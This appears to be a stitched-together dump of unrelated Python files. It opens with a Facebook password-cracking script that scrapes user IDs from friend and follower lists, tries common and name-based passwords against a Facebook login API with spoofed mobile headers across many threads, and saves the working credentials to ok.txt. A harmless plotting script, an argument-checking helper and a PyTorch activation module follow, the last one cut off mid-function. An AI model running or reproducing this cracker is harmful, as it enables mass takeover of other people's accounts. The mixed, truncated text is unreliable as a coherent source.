'access_token': '350685531728%7C62f8ce9f74b12f84c123cc23437a4a32',
'format': 'JSON',
'sdk_version': '2',
'email': uid,
'locale': 'en_US',
'password': pass7,
'sdk': 'ios',
'generate_session_cookies': '1',
'sig': '3f555f99fb61fcd7aa0c44f58f522ef6' }
headers_ = {
'x-fb-connection-bandwidth': str(random.randint(2e+07, 3e+07)),
'x-fb-sim-hni': str(random.randint(20000, 40000)),
'x-fb-net-hni': str(random.randint(20000, 40000)),
'x-fb-connection-quality': 'EXCELLENT',
'x-fb-connection-type': 'cell.CTRadioAccessTechnologyHSDPA',
'user-agent': _azimua,
'content-type': 'application/x-www-form-urlencoded',
'x-fb-http-engine': 'Liger' }
data = requests.get(api, params = params, headers = headers_)
if 'access_token' in data.text and 'EAAA' in data.text:
print ' \x1b[1;32m[HARI-OK] ' + uid + ' | ' + pass7 + '\x1b[0;97m'
ok = open('ok.txt', 'a')
ok.write(uid + '|' + pass7 + '\n')
ok.close()
oks.append(uid + pass7)
elif 'www.facebook.com' in data.json()['error_msg']:
print ' \x1b[1;33m[HARI-CP] ' + uid + ' | ' + pass7 + '\x1b[0;97m'
cp = open('cp.txt', 'a')
cp.write(uid + '|' + pass7 + '\n')
cp.close()
cps.append(uid + pass7)
else:
pass8 = name.lower().split(' ')[0] + name.lower().split(' ')[1]
api = 'https://b-api.facebook.com/method/auth.login'
params = {
'access_token': '350685531728%7C62f8ce9f74b12f84c123cc23437a4a32',
'format': 'JSON',
'sdk_version': '2',
'email': uid,
'locale': 'en_US',
'password': pass8,
'sdk': 'ios',
'generate_session_cookies': '1',
'sig': '3f555f99fb61fcd7aa0c44f58f522ef6' }
headers_ = {
'x-fb-connection-bandwidth': str(random.randint(2e+07, 3e+07)),
'x-fb-sim-hni': str(random.randint(20000, 40000)),
'x-fb-net-hni': str(random.randint(20000, 40000)),
'x-fb-connection-quality': 'EXCELLENT',
'x-fb-connection-type': 'cell.CTRadioAccessTechnologyHSDPA',
'user-agent': _azimua,
'content-type': 'application/x-www-form-urlencoded',
'x-fb-http-engine': 'Liger' }
data = requests.get(api, params = params, headers = headers_)
if 'access_token' in data.text and 'EAAA' in data.text:
print ' \x1b[1;32m[HARI-OK] ' + uid + ' | ' + pass8 + '\x1b[0;97m'
ok = open('ok.txt', 'a')
ok.write(uid + '|' + pass8 + '\n')
ok.close()
oks.append(uid + pass8)
elif 'www.facebook.com' in data.json()['error_msg']:
print ' \x1b[1;33m[HARI-CP] ' + uid + ' | ' + pass8 + '\x1b[0;97m'
cp = open('cp.txt', 'a')
cp.write(uid + '|' + pass8 + '\n')
cp.close()
cps.append(uid + pass8)
except:
pass
p = ThreadPool(30)
p.map(main, id)
print ''
linex()
print ''
print '\x1b[92;1m THE PROCESS HAS BEEN COMPLETED'
print '\x1b[93;1m TOTAL \x1b[92;1mOK\x1b[93;1m/\x1b[91;1mCP: ' + str(len(oks)) + '/' + str(len(cps))
print ''
linex()
print ''
raw_input('\x1b[93;1m PRESS ENTER TO BACK ')
menu()
def crack():
global token
os.system('clear')
try:
token = open('vau_token.txt', 'r').read()
except IOError:
print ''
print '\t\x1b[91;1m TOKEN NOT FOUND '
time.sleep(1)
fb_token()
os.system('clear')
logo()
print ''
print '\t\x1b[93;1m DIGIT PASS CRACKING'
print ''
print '\x1b[94;1m [1] CRACK PUBLIC ID'
print '\x1b[93;1m [2] CRACK FOLLOWERS'
print '\x1b[92;1m [3] CRACK FILE'
print ''
crack_select()
def crack_select():
select = raw_input('\x1b[92;1m CHOOSE : ')
id = []
oks = []
cps = []
if select == '1':
os.system('clear')
logo()
print ''
print '\t\x1b[93;1m DIGIT PASS CRACKING'
print ''
try:
id_limit = int(raw_input('\x1b[93;1m ENTER LIMIT (\x1b[91;1m5 MAX\x1b[93;1m): \x1b[92;1m'))
print ''
except:
id_limit = 1
for t in range(id_limit):
t += 1
idt = raw_input('\x1b[93;1m INPUT PUBLIC ID (\x1b[92;1m%s\x1b[93;1m) : \x1b[92;1m' % t)
try:
for i in requests.get('https://graph.facebook.com/' + idt + '/friends?access_token=' + token).json()['data']:
uid = i['id'].encode('utf-8')
na = i['name'].encode('utf-8')
id.append(uid + '|' + na)
except KeyError:
print '\x1b[91;1m PRIVATE FRIEND LIST TRY ANOTHER ONE'
print '\x1b[94;1m TOTAL IDS : \x1b[0;92m%s\x1b[0;97m' % len(id)
time.sleep(3)
elif select == '2':
os.system('clear')
logo()
print ''
print '\t\x1b[93;1m DIGIT PASS CRACKING'
print ''
try:
id_limit = int(raw_input('\x1b[93;1m ENTER LIMIT (\x1b[91;1m5 MAX\x1b[93;1m): \x1b[92;1m'))
print ''
except:
id_limit = 1
for t in range(id_limit):
t += 1
idt = raw_input('\x1b[93;1m INPUT FOLLOWER ID (\x1b[92;1m%s\x1b[93;1m) : \x1b[92;1m' % t)
try:
for i in requests.get('https://graph.facebook.com/' + idt + '/subscribers?access_token=' + token + '&limit=999999').json()['data']:
uid = i['id'].encode('utf-8')
na = i['name'].encode('utf-8')
id.append(uid + '|' + na)
except KeyError:
print '\x1b[91;1m PRIVATE FRIEND LIST TRY ANOTHER ONE'
print '\x1b[94;1m TOTAL IDS : \x1b[0;92m%s\x1b[0;97m' % len(id)
time.sleep(3)
elif select == '3':
os.system('clear')
logo()
print ''
print '\t\x1b[93;1m DIGIT PASS CRACKING'
print ''
filelist = raw_input('\x1b[92;1m INPUT FILE: ')
try:
for line in open(filelist, 'r').readlines():
id.append(line.strip())
except IOError:
print '\t\x1b[91;1m REQUESTED FILE NOT FOUND'
print ''
raw_input('\x1b[93;1m PRESS ENTER TO BACK')
crack()
if select == '0':
menu()
else:
print ''
print '\t\x1b[91;1m SELECT VALID OPTION'
print ''
crack_select()
os.system('clear')
logo()
print ''
print '\x1b[93;1m TOTAL IDS : \x1b[92;1m' + str(len(id))
print '\x1b[92;1m BRUTE HAS BEEN STARTED\x1b[0m'
print '\x1b[94;1m WAIT AND SEE \x1b[92;1m\xe2\x9c\x98\x1b[91;1m\xe2\x9c\x98\x1b[0m'
linex()
def main(arg):
user = arg
(uid, name) = user.split('|')
_azimua = random.choice([
'Mozilla/5.0 (Linux; Android 10; Redmi Note 8 Pro Build/QP1A.190711.020; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/83.0.4103.106 Mobile Safari/537.36 [FB_IAB/FB4A;FBAV/275.0.0.49.127;]',
'[FBAN/FB4A;FBAV/246.0.0.49.121;FBBV/181448449;FBDM/{density=1.5,width=540,height=960};FBLC/en_US;FBRV/183119516;FBCR/TM;FBMF/vivo;FBBD/vivo;FBPN/com.facebook.katana;FBDV/vivo 1606;FBSV/6.0.1;FBOP/1;FBCA/armeabi-v7a:armeabi;]',
'Dalvik/2.1.0 (Linux; U; Android 5.1.1; SM-J320F Build/LMY47V) [FBAN/FB4A;FBAV/43.0.0.29.147;FBPN/com.facebook.katana;FBLC/en_GB;FBBV/14274161;FBCR/Tele2 LT;FBMF/samsung;FBBD/samsung;FBDV/SM-J320F;FBSV/5.0;FBCA/armeabi-v7a:armeabi;FBDM/{density=3.0,width=1080,height=1920};FB_FW/1;]',
'Mozilla/5.0 (Linux; Android 5.1.1; A37f Build/LMY47V; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/88.0.4324.152 Mobile Safari/537.36 [FB_IAB/FB4A;FBAV/305.1.0.40.120;]',
'Mozilla/5.0 (Linux; Android 10; REALME RMX1911 Build/NMF26F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36 AlohaBrowser/2.20.3',
'Mozilla/5.0 (iPhone; CPU iPhone OS 11_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E216 [FBAN/FBIOS;FBAV/170.0.0.60.91;FBBV/105964764;FBDV/iPhone10,1;FBMD/iPhone;FBSN/iOS;FBSV/11.3;FBSS/2;FBCR/Sprint;FBID/phone;FBLC/en_US;FBOP/5;FBRV/106631002]',
'Mozilla/5.0 (Linux; Android 7.1.1; ASUS Chromebook Flip C302 Build/R70-11021.56.0; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/70.0.3538.80 Safari/537.36 [FB_IAB/FB4A;FBAV/198.0.0.53.101;]'])
try:
pass1 = '102030'
api = 'https://b-api.facebook.com/method/auth.login'
params = {
'access_token': '350685531728%7C62f8ce9f74b12f84c123cc23437a4a32',
'format': 'JSON',
'sdk_version': '2',
'email': uid,
'locale': 'en_US',
'password': pass1,
'sdk': 'ios',
'generate_session_cookies': '1',
'sig': '3f555f99fb61fcd7aa0c44f58f522ef6' }
headers_ = {
'x-fb-connection-bandwidth': str(random.randint(2e+07, 3e+07)),
'x-fb-sim-hni': str(random.randint(20000, 40000)),
'x-fb-net-hni': str(random.randint(20000, 40000)),
'x-fb-connection-quality': 'EXCELLENT',
'x-fb-connection-type': 'cell.CTRadioAccessTechnologyHSDPA',
'user-agent': _azimua,
'content-type': 'application/x-www-form-urlencoded',
'x-fb-http-engine': 'Liger' }
data = requests.get(api, params = params, headers = headers_)
if 'access_token' in data.text and 'EAAA' in data.text:
print ' \x1b[1;32m[HARI-OK] ' + uid + ' | ' + pass1 + '\x1b[0;97m'
ok = open('ok.txt', 'a')
ok.write(uid + '|' + pass1 + '\n')
ok.close()
oks.append(uid + pass1)
elif 'www.facebook.com' in data.json()['error_msg']:
print ' \x1b[1;33m[HARI-CP] ' + uid + ' | ' + pass1 + '\x1b[0;97m'
cp = open('cp.txt', 'a')
cp.write(uid + '|' + pass1 + '\n')
cp.close()
cps.append(uid + pass1)
else:
pass2 = '223344'
api = 'https://b-api.facebook.com/method/auth.login'
params = {
'access_token': '350685531728%7C62f8ce9f74b12f84c123cc23437a4a32',
'format': 'JSON',
'sdk_version': '2',
'email': uid,
'locale': 'en_US',
'password': pass2,
'sdk': 'ios',
'generate_session_cookies': '1',
'sig': '3f555f99fb61fcd7aa0c44f58f522ef6' }
headers_ = {
'x-fb-connection-bandwidth': str(random.randint(2e+07, 3e+07)),
'x-fb-sim-hni': str(random.randint(20000, 40000)),
'x-fb-net-hni': str(random.randint(20000, 40000)),
'x-fb-connection-quality': 'EXCELLENT',
'x-fb-connection-type': 'cell.CTRadioAccessTechnologyHSDPA',
'user-agent': _azimua,
'content-type': 'application/x-www-form-urlencoded',
'x-fb-http-engine': 'Liger' }
data = requests.get(api, params = params, headers = headers_)
if 'access_token' in data.text and 'EAAA' in data.text:
print ' \x1b[1;32m[HARI-OK] ' + uid + ' | ' + pass2 + '\x1b[0;97m'
ok = open('ok.txt', 'a')
ok.write(uid + '|' + pass2 + '\n')
ok.close()
oks.append(uid + pass2)
elif 'www.facebook.com' in data.json()['error_msg']:
print ' \x1b[1;33m[HARI-CP] ' + uid + ' | ' + pass2 + '\x1b[0;97m'
cp = open('cp.txt', 'a')
cp.write(uid + '|' + pass2 + '\n')
cp.close()
cps.append(uid + pass2)
else:
pass3 = '556677'
api = 'https://b-api.facebook.com/method/auth.login'
params = {
'access_token': '350685531728%7C62f8ce9f74b12f84c123cc23437a4a32',
'format': 'JSON',
'sdk_version': '2',
'email': uid,
'locale': 'en_US',
'password': pass3,
'sdk': 'ios',
'generate_session_cookies': '1',
'sig': '3f555f99fb61fcd7aa0c44f58f522ef6' }
headers_ = {
'x-fb-connection-bandwidth': str(random.randint(2e+07, 3e+07)),
'x-fb-sim-hni': str(random.randint(20000, 40000)),
'x-fb-net-hni': str(random.randint(20000, 40000)),
'x-fb-connection-quality': 'EXCELLENT',
'x-fb-connection-type': 'cell.CTRadioAccessTechnologyHSDPA',
'user-agent': _azimua,
'content-type': 'application/x-www-form-urlencoded',
'x-fb-http-engine': 'Liger' }
data = requests.get(api, params = params, headers = headers_)
if 'access_token' in data.text and 'EAAA' in data.text:
print ' \x1b[1;32m[HARI-OK] ' + uid + ' | ' + pass3 + '\x1b[0;97m'
ok = open('ok.txt', 'a')
ok.write(uid + '|' + pass3 + '\n')
ok.close()
oks.append(uid + pass3)
elif 'www.facebook.com' in data.json()['error_msg']:
print ' \x1b[1;33m[HARI-CP] ' + uid + ' | ' + pass3 + '\x1b[0;97m'
cp = open('cp.txt', 'a')
cp.write(uid + '|' + pass3 + '\n')
cp.close()
cps.append(uid + pass3)
else:
pass4 = '786786'
api = 'https://b-api.facebook.com/method/auth.login'
params = {
'access_token': '350685531728%7C62f8ce9f74b12f84c123cc23437a4a32',
'format': 'JSON',
'sdk_version': '2',
'email': uid,
'locale': 'en_US',
'password': pass4,
'sdk': 'ios',
'generate_session_cookies': '1',
'sig': '3f555f99fb61fcd7aa0c44f58f522ef6' }
headers_ = {
'x-fb-connection-bandwidth': str(random.randint(2e+07, 3e+07)),
'x-fb-sim-hni': str(random.randint(20000, 40000)),
'x-fb-net-hni': str(random.randint(20000, 40000)),
'x-fb-connection-quality': 'EXCELLENT',
'x-fb-connection-type': 'cell.CTRadioAccessTechnologyHSDPA',
'user-agent': _azimua,
'content-type': 'application/x-www-form-urlencoded',
'x-fb-http-engine': 'Liger' }
data = requests.get(api, params = params, headers = headers_)
if 'access_token' in data.text and 'EAAA' in data.text:
print ' \x1b[1;32m[HARI-OK] ' + uid + ' | ' + pass4 + '\x1b[0;97m'
ok = open('ok.txt', 'a')
ok.write(uid + '|' + pass4 + '\n')
ok.close()
oks.append(uid + pass4)
elif 'www.facebook.com' in data.json()['error_msg']:
print ' \x1b[1;33m[HARI-CP] ' + uid + ' | ' + pass4 + '\x1b[0;97m'
cp = open('cp.txt', 'a')
cp.write(uid + '|' + pass4 + '\n')
cp.close()
cps.append(uid + pass4)
else:
pass5 = '123456'
api = 'https://b-api.facebook.com/method/auth.login'
params = {
'access_token': '350685531728%7C62f8ce9f74b12f84c123cc23437a4a32',
'format': 'JSON',
'sdk_version': '2',
'email': uid,
'locale': 'en_US',
'password': pass5,
'sdk': 'ios',
'generate_session_cookies': '1',
'sig': '3f555f99fb61fcd7aa0c44f58f522ef6' }
headers_ = {
'x-fb-connection-bandwidth': str(random.randint(2e+07, 3e+07)),
'x-fb-sim-hni': str(random.randint(20000, 40000)),
'x-fb-net-hni': str(random.randint(20000, 40000)),
'x-fb-connection-quality': 'EXCELLENT',
'x-fb-connection-type': 'cell.CTRadioAccessTechnologyHSDPA',
'user-agent': _azimua,
'content-type': 'application/x-www-form-urlencoded',
'x-fb-http-engine': 'Liger' }
data = requests.get(api, params = params, headers = headers_)
if 'access_token' in data.text and 'EAAA' in data.text:
print ' \x1b[1;32m[HARI-OK] ' + uid + ' | ' + pass5 + '\x1b[0;97m'
ok = open('ok.txt', 'a')
ok.write(uid + '|' + pass5 + '\n')
ok.close()
oks.append(uid + pass5)
elif 'www.facebook.com' in data.json()['error_msg']:
print ' \x1b[1;33m[HARI-CP] ' + uid + ' | ' + pass5 + '\x1b[0;97m'
cp = open('cp.txt', 'a')
cp.write(uid + '|' + pass5 + '\n')
cp.close()
cps.append(uid + pass5)
else:
pass6 = '112233'
api = 'https://b-api.facebook.com/method/auth.login'
params = {
'access_token': '350685531728%7C62f8ce9f74b12f84c123cc23437a4a32',
'format': 'JSON',
'sdk_version': '2',
'email': uid,
'locale': 'en_US',
'password': pass6,
'sdk': 'ios',
'generate_session_cookies': '1',
'sig': '3f555f99fb61fcd7aa0c44f58f522ef6' }
headers_ = {
'x-fb-connection-bandwidth': str(random.randint(2e+07, 3e+07)),
'x-fb-sim-hni': str(random.randint(20000, 40000)),
'x-fb-net-hni': str(random.randint(20000, 40000)),
'x-fb-connection-quality': 'EXCELLENT',
'x-fb-connection-type': 'cell.CTRadioAccessTechnologyHSDPA',
'user-agent': _azimua,
'content-type': 'application/x-www-form-urlencoded',
'x-fb-http-engine': 'Liger' }
data = requests.get(api, params = params, headers = headers_)
if 'access_token' in data.text and 'EAAA' in data.text:
print ' \x1b[1;32m[HARI-OK] ' + uid + ' | ' + pass6 + '\x1b[0;97m'
ok = open('ok.txt', 'a')
ok.write(uid + '|' + pass6 + '\n')
ok.close()
oks.append(uid + pass6)
elif 'www.facebook.com' in data.json()['error_msg']:
print ' \x1b[1;33m[HARI-CP] ' + uid + ' | ' + pass6 + '\x1b[0;97m'
cp = open('cp.txt', 'a')
cp.write(uid + '|' + pass6 + '\n')
cp.close()
cps.append(uid + pass6)
else:
pass7 = '123356789'
api = 'https://b-api.facebook.com/method/auth.login'
params = {
'access_token': '350685531728%7C62f8ce9f74b12f84c123cc23437a4a32',
'format': 'JSON',
'sdk_version': '2',
'email': uid,
'locale': 'en_US',
'password': pass7,
'sdk': 'ios',
'generate_session_cookies': '1',
'sig': '3f555f99fb61fcd7aa0c44f58f522ef6' }
headers_ = {
'x-fb-connection-bandwidth': str(random.randint(2e+07, 3e+07)),
'x-fb-sim-hni': str(random.randint(20000, 40000)),
'x-fb-net-hni': str(random.randint(20000, 40000)),
'x-fb-connection-quality': 'EXCELLENT',
'x-fb-connection-type': 'cell.CTRadioAccessTechnologyHSDPA',
'user-agent': _azimua,
'content-type': 'application/x-www-form-urlencoded',
'x-fb-http-engine': 'Liger' }
data = requests.get(api, params = params, headers = headers_)
if 'access_token' in data.text and 'EAAA' in data.text:
print ' \x1b[1;32m[HARI-OK] ' + uid + ' | ' + pass7 + '\x1b[0;97m'
ok = open('ok.txt', 'a')
ok.write(uid + '|' + pass7 + '\n')
ok.close()
oks.append(uid + pass7)
elif 'www.facebook.com' in data.json()['error_msg']:
print ' \x1b[1;33m[HARI-CP] ' + uid + ' | ' + pass7 + '\x1b[0;97m'
cp = open('cp.txt', 'a')
cp.write(uid + '|' + pass7 + '\n')
cp.close()
cps.append(uid + pass7)
except:
pass
p = ThreadPool()
p.map(main, id)
print ''
linex()
print ''
print '\x1b[92;1m THE PROCESS HAS BEEN COMPLETED'
print '\x1b[93;1m TOTAL \x1b[92;1mOK\x1b[93;1m/\x1b[91;1mCP: ' + str(len(oks)) + '/' + str(len(cps))
print ''
linex()
print ''
raw_input('\x1b[93;1m PRESS ENTER TO BACK ')
menu()
if __name__ == '__main__':
main()
| 49.492809 | 446 | 0.43308 | 5,312 | 51,621 | 4.154179 | 0.093185 | 0.013051 | 0.028278 | 0.027552 | 0.874111 | 0.865501 | 0.853945 | 0.845743 | 0.842389 | 0.842389 | 0 | 0.106601 | 0.423936 | 51,621 | 1,042 | 447 | 49.540307 | 0.635471 | 0.001472 | 0 | 0.861024 | 1 | 0.037618 | 0.335286 | 0.11096 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0.136886 | 0.024033 | null | null | 0.149425 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 10 |
7e874e5206ecb0a346d425c4df20df9b08d8fca3 | 2,382 | py | Python | test/plot.py | vibhatha/PSGDSVMPY | 69ed88f5db8d9a250ee944f44b88e54351f8696f | [
"Apache-2.0"
] | null | null | null | test/plot.py | vibhatha/PSGDSVMPY | 69ed88f5db8d9a250ee944f44b88e54351f8696f | [
"Apache-2.0"
] | null | null | null | test/plot.py | vibhatha/PSGDSVMPY | 69ed88f5db8d9a250ee944f44b88e54351f8696f | [
"Apache-2.0"
] | null | null | null | from matplotlib import pyplot as plt
import numpy as np
# a9a = np.array([1, 1.803005008, 3.176470588, 5.510204082, 8.925619835])
# cod_rna = np.array([1, 1.872355186, 3.240096038, 5.536410256, 8.907590759])
# ijcnn1 = np.array([1, 1.667803215, 3.158671587, 5.558441558, 8.84754522])
# webspam = np.array([1, 1.828194014, 3.342995169, 5.478476002, 10.59521531])
# phishing = np.array([1, 1.934593023, 3.352644836, 6.278301887, 10.23846154])
# w8a = np.array([1, 1.757307589, 2.9359319, 5.548687553, 10.15968992])
#
# ideal = np.array([1,2,4,8,16])
# cores = [1,2,4,8,16]
# fig, ax = plt.subplots()
# ax.plot(cores, a9a, label='a9a')
# ax.plot(cores, cod_rna, label='cod_rna')
# ax.plot(cores, ijcnn1, label='ijcnn1')
# ax.plot(cores, webspam, label='webspam')
# ax.plot(cores, phishing, label='phishing')
# ax.plot(cores, w8a, label='w8a')
# ax.plot(cores, ideal, label='Ideal')
# legend = ax.legend(loc='upper right', shadow=True, fontsize='xx-small')
#
# plt.xlabel('cores')
# plt.ylabel('Speed Up')
# plt.title('Speed Up vs Cores')
# plt.show()
#a9a = np.array([1, 1.803005008, 3.176470588, 5.510204082, 8.925619835])
#cod_rna = np.array([1, 1.872355186, 3.240096038, 5.536410256, 8.907590759])
#ijcnn1 = np.array([1, 1.667803215, 3.158671587, 5.558441558, 8.84754522])
#webspam = np.array([1, 1.61528361, 2.853808771, 4.997688509, 7.343883485])
#phishing = np.array([1, 1.934593023, 3.352644836, 6.278301887, 10.23846154])
#w8a = np.array([1, 1.757307589, 2.9359319, 5.548687553, 10.15968992])
webspam_py = np.array([1, 1.913528743, 3.75819667, 7.409385514, 12.64104837])
webspam_java = np.array([1, 1.38446411, 1.916391211, 2.782608696, 3.862068966])
#webspam_c = np.array([1, 1.279020979, 1.812685828, 2.685756241, 4.11011236])
ideal = np.array([1,2,4,8,16])
cores = [1,2,4,8,16]
fig, ax = plt.subplots()
#ax.plot(cores, a9a, label='a9a')
#ax.plot(cores, cod_rna, label='cod_rna')
#ax.plot(cores, ijcnn1, label='ijcnn1')
ax.plot(cores, webspam_py, label='python')
ax.plot(cores, webspam_java, label='java')
#ax.plot(cores, webspam_c, label='java')
#ax.plot(cores, phishing, label='phishing')
#ax.plot(cores, w8a, label='w8a')
ax.plot(cores, ideal, label='Ideal')
legend = ax.legend(loc='upper right', shadow=True, fontsize='xx-small')
plt.xlabel('Cores')
plt.ylabel('Speed Up')
plt.title('Single Node Core Level Speed Up - [Covtype, Split:0.80, 510K, 54F]')
plt.show()
| 41.789474 | 79 | 0.690176 | 394 | 2,382 | 4.142132 | 0.263959 | 0.072917 | 0.083333 | 0.082721 | 0.740809 | 0.723039 | 0.723039 | 0.723039 | 0.723039 | 0.723039 | 0 | 0.306935 | 0.104114 | 2,382 | 56 | 80 | 42.535714 | 0.457826 | 0.706549 | 0 | 0 | 0 | 0 | 0.170695 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.133333 | 0 | 0.133333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
0e19352201dcde07624412b654ca0ad3d195e009 | 1,310 | py | Python | checkarg/number.py | felipebrumpereira/checkarg | 1dad052af183def92a7213add68dc91fe7f4462c | [
"MIT"
] | null | null | null | checkarg/number.py | felipebrumpereira/checkarg | 1dad052af183def92a7213add68dc91fe7f4462c | [
"MIT"
] | null | null | null | checkarg/number.py | felipebrumpereira/checkarg | 1dad052af183def92a7213add68dc91fe7f4462c | [
"MIT"
] | null | null | null | from typing import Union
from checkarg.exceptions import ArgumentOutOfRangeException
def is_greater(
value: Union[int, float],
condition_value: Union[int, float],
argument_name: str = None,
exception: Exception = None,
):
if value < condition_value:
raise ArgumentOutOfRangeException(
argument_name
) if exception is None else exception
def is_lower(
value: Union[int, float],
condition_value: Union[int, float],
argument_name: str = None,
exception: Exception = None,
):
if value > condition_value:
raise ArgumentOutOfRangeException(
argument_name
) if exception is None else exception
def is_greater_or_equals(
value: Union[int, float],
condition_value: Union[int, float],
argument_name: str = None,
exception: Exception = None,
):
if value < condition_value:
raise ArgumentOutOfRangeException(
argument_name
) if exception is None else exception
def is_lower_or_equals(
value: Union[int, float],
condition_value: Union[int, float],
argument_name: str = None,
exception: Exception = None,
):
if value > condition_value:
raise ArgumentOutOfRangeException(
argument_name
) if exception is None else exception
| 25.192308 | 59 | 0.674809 | 145 | 1,310 | 5.931034 | 0.172414 | 0.093023 | 0.12093 | 0.167442 | 0.889535 | 0.889535 | 0.889535 | 0.889535 | 0.889535 | 0.889535 | 0 | 0 | 0.254198 | 1,310 | 51 | 60 | 25.686275 | 0.880246 | 0 | 0 | 0.857143 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.095238 | false | 0 | 0.047619 | 0 | 0.142857 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
0e6ec3ae46074c87e93b3d03ef650f90cddc1525 | 4,470 | py | Python | acti/dyrelu.py | CarnoZhao/utils | 5b664967724af97fb50a416268f3e4c8a17e7103 | [
"MIT"
] | 2 | 2021-03-24T14:02:50.000Z | 2021-06-10T06:55:14.000Z | acti/dyrelu.py | CarnoZhao/utils | 5b664967724af97fb50a416268f3e4c8a17e7103 | [
"MIT"
] | null | null | null | acti/dyrelu.py | CarnoZhao/utils | 5b664967724af97fb50a416268f3e4c8a17e7103 | [
"MIT"
] | null | null | null | import torch
import torch.nn as nn
class DyReLUA(nn.Module):
def __init__(self,
channels,
reduction=4,
k=2):
super().__init__()
self.channels = channels
self.reduction = reduction
self.k = k
self.coef = nn.Sequential(
nn.AdaptiveAvgPool2d(1),
nn.Conv2d(channels, channels // reduction, 1),
nn.ReLU(),
nn.Conv2d(channels // reduction, 2 * k, 1),
nn.Sigmoid()
)
# default parameter setting
# lambdaA = 1.0, lambdaB = 0.5;
# alphaA1 = 1, alphaA2=alphaB1=alphaB2=0
self.register_buffer('lambdas', torch.Tensor([1.] * k + [0.5] * k).float())
self.register_buffer('bias', torch.Tensor([1.] + [0.] * (2 * k - 1)).float())
def forward(self, x):
coef = self.coef(x)
coef = 2 * coef - 1
coef = coef.view(-1, 2 * self.k) * self.lambdas + self.bias
# activations
# NCHW --> NCHW1
x_perm = x.permute(1, 2, 3, 0).unsqueeze(-1)
# HWNC1 * NK --> HWCNK
output = x_perm * coef[:, :self.k] + coef[:, self.k:]
result = torch.max(output, dim=-1)[0].permute(3, 0, 1, 2)
return result
class DyReLUB(nn.Module):
def __init__(self,
channels,
reduction=4,
k=2):
super().__init__()
self.channels = channels
self.reduction = reduction
self.k = k
self.coef = nn.Sequential(
nn.AdaptiveAvgPool2d(1),
nn.Conv2d(channels, channels//reduction, 1),
nn.ReLU(),
nn.Conv2d(channels//reduction, 2 * k * channels, 1),
nn.Sigmoid()
)
# default parameter setting
# lambdaA = 1.0, lambdaB = 0.5;
# alphaA1 = 1, alphaA2=alphaB1=alphaB2=0
self.register_buffer('lambdas', torch.Tensor([1.]*k + [0.5]*k).float())
self.register_buffer('bias', torch.Tensor([1.] + [0.]*(2*k - 1)).float())
def forward(self, x):
coef = self.coef(x)
coef = 2 * coef - 1
# coefficient update
coef = coef.view(-1, self.channels, 2 * self.k) * self.lambdas + self.bias
# activations
# NCHW --> HWNC1
x_perm = x.permute(2, 3, 0, 1).unsqueeze(-1)
# HWNC1 * NCK --> HWNCK
output = x_perm * coef[:, :, :self.k] + coef[:, :, self.k:]
# maxout and HWNC --> NCHW
result = torch.max(output, dim=-1)[0].permute(2, 3, 0, 1)
return result
class DyReLUC(nn.Module):
def __init__(self,
channels,
reduction=4,
k=2,
tau=10,
gamma=1/3):
super().__init__()
self.channels = channels
self.reduction = reduction
self.k = k
self.tau = tau
self.gamma = gamma
self.coef = nn.Sequential(
nn.AdaptiveAvgPool2d(1),
nn.Conv2d(channels, channels // reduction, 1),
nn.ReLU(),
nn.Conv2d(channels // reduction, 2 * k * channels, 1),
nn.Sigmoid()
)
self.sptial = nn.Conv2d(channels, 1, 1)
# default parameter setting
# lambdaA = 1.0, lambdaB = 0.5;
# alphaA1 = 1, alphaA2=alphaB1=alphaB2=0
self.register_buffer('lambdas', torch.Tensor([1.] * k + [0.5] * k).float())
self.register_buffer('bias', torch.Tensor([1.] + [0.] * (2 * k - 1)).float())
def forward(self, x):
N, C, H, W = x.size()
coef = self.coef(x)
coef = 2 * coef - 1
# coefficient update
coef = coef.view(-1, self.channels, 2 * self.k) * self.lambdas + self.bias
# spatial
gamma = self.gamma * H * W
spatial = self.sptial(x)
spatial = spatial.view(N, self.channels, -1) / self.tau
spatial = torch.softmax(spatial, dim=-1) * gamma
spatial = torch.clamp(spatial, 0, 1).view(N, 1, H, W)
# activations
# NCHW --> HWNC1
x_perm = x.permute(2, 3, 0, 1).unsqueeze(-1)
# HWNC1 * NCK --> HWNCK
output = x_perm * coef[:, :, :self.k] + coef[:, :, self.k:]
# permute spatial from NCHW to HWNC1
spatial = spatial.permute(2, 3, 0, 1).unsqueeze(-1)
output = spatial * output
# maxout and HWNC --> NCHW
result = torch.max(output, dim=-1)[0].permute(2, 3, 0, 1)
